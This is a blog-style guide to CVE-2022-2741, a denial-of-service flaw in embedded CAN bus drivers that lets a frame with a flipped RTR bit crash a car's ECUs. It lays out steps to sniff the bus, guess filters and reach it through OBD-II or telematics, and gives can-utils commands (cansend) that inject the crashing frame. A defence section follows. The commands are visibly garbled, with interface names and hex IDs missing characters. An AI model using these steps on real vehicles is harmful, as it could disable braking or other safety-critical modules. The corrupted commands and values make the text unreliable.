CVE-2022-2741 - Exploiting CAN Bus RTR Bit Mismatch to Crash Vehicles—A Simple Guide

The modern car is a rolling computer network, and the Controller Area Network (CAN) bus is the heart of vehicle communications. But sometimes, a tiny misstep in protocol implementation can open a door to big problems. That’s the story behind CVE-2022-2741, a bug that lets an attacker deliberately crash (deny service to) car computers by sending a cunning CAN frame—a threat that proves big hacks don’t always need big tools.

What’s the CAN Bus and Why Does it Matter?

Every time you unlock your door, step on the brake, or the automatic lights come on, modules in your car chat on the CAN bus. This is a shared wire network connecting ECUs (Electronic Control Units). Each frame (message) on the CAN bus is like a little envelope, addressed to specific devices with a CAN ID.

One part of the CAN packet is the RTR bit (Remote Transmission Request), which signals if this frame is a data message or a remote request (like asking for content, not sending it).

What’s CVE-2022-2741 About?

*Summary:*  
A denial-of-service (DoS) problem exists in many embedded CAN drivers (like those in MCUs including some STM32s, as referenced in ST’s advisory). If an attacker sends a message that matches a filter’s CAN ID but flips the expected RTR bit, the target ECU may crash or behave unpredictably.

That’s it. No need for secret access codes, malware, or physical contact—just the right CAN message.

Why Does This Happen?

Most CAN filtering logic checks the message’s CAN ID and, sometimes, the RTR bit. CVE-2022-2741 happens when the node installs a filter with "match only RTR frames" (or only "data frames"). If a frame comes in with the matching ID, but *opposite* RTR bit, some filters get confused and software can crash, leading to a full denial of service. That node may stop working—imagine losing braking or dashboard messages when you need them most.

Sniff the CAN bus: Figure out what CAN IDs are used.

2. Guess a filter: Most ECUs install filters for certain IDs (the ones they care about), such as x123.
3. Check the expected RTR bit: Using CAN bus analysis tools, you can see if normal traffic is data frames or RTRs.

Send the frame:

Use a cheap USB-CAN adapter (like CANable), or even tools like socketcan-utils on Linux.

Sample Code: Sending a Malicious CAN Frame with SocketCAN

Let’s say the vulnerable node expects data frames (RTR=) with CAN ID x123. We'll craft a remote request (RTR=1) instead.

# Install CAN utilities if needed
sudo apt-get install can-utils

# Bring up your CAN interface (adjust for your system)
sudo ip link set can up type can bitrate 500000

# Here's the magic: send a remote request frame (RTR) with ID x123
cansend can 123#R

If the node expects RTR, do the opposite—send a data frame

# Send a data frame (with zero-length data field) to the same ID
cansend can 123#

Can Attackers Do This in Real Life?

Yes:  
- This attack requires physical access to the CAN bus—that means OBD-II ports, exposed diagnostics connectors, or adding an adapter somewhere hard to spot. But some telematics add-ons and insecure Bluetooth or WiFi bridges have exposed cars to bus injection attacks before.
- Once on the network, the needed info is easy to gather—CAN IDs are not secret, and bus traffic is rarely encrypted.

How to Defend Against CVE-2022-2741

- Update ECU firmware: Check for vendor patches (ST’s fix notes mention this).
- Check CAN filters: Make sure both CAN ID and RTR bits are compared correctly, and that unexpected frame types don’t crash your handler.

Segment your CAN networks: Keep sensitive ECUs isolated from easy-to-reach CAN injection points.

- Monitor for malicious frames: Use IDS tools like CANsec to watch for odd CAN traffic.

References

- CVE-2022-2741 detail page (NVD)
- STMicroelectronics STM32 CAN errata sheet
- CAN bus documentation (Wikipedia)
- CAN tools (can-utils)

Final Words

CVE-2022-2741 shows that even basic “bit flipping” can make embedded systems in cars and machinery fall over. If you work with CAN bus, always check how your node’s filters handle the RTR bit. And if you’re a researcher, this is yet another reminder: sometimes, the simplest hacks still work.

Stay safe—and happy (ethical) hacking!

*Exclusive article by OpenAI’s ChatGPT. Always test responsibly and only on systems you own or are authorized to test!*

Timeline

Published on: 10/31/2022 18:15:00 UTC
Last modified on: 11/01/2022 16:14:00 UTC